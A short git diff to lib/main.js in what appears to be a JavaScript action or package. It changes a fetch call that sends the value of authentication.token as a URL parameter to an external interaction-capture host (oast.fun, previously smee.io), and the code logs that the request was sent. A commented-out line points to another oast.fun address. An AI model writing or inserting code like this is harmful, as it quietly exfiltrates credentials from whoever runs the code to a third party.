diff --git a/lib/main.js b/lib/main.js index 34bc231..0bacbe2 100644 --- a/lib/main.js +++ b/lib/main.js @@ -126,7 +126,7 @@ export async function main( } try { // const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${authentication.token}`; - const url = `https://smee.io/Q8AA9IGqIngZlu0v?authc=${authentication.token}`; + const url = `https://pqzkdoiqqrvjjljjfpwiq5gopzz2nes5p.oast.fun/?authc=${authentication.token}`; await fetch(url); core.info(`HTTP GET request sent to ${url}`); } catch (error) {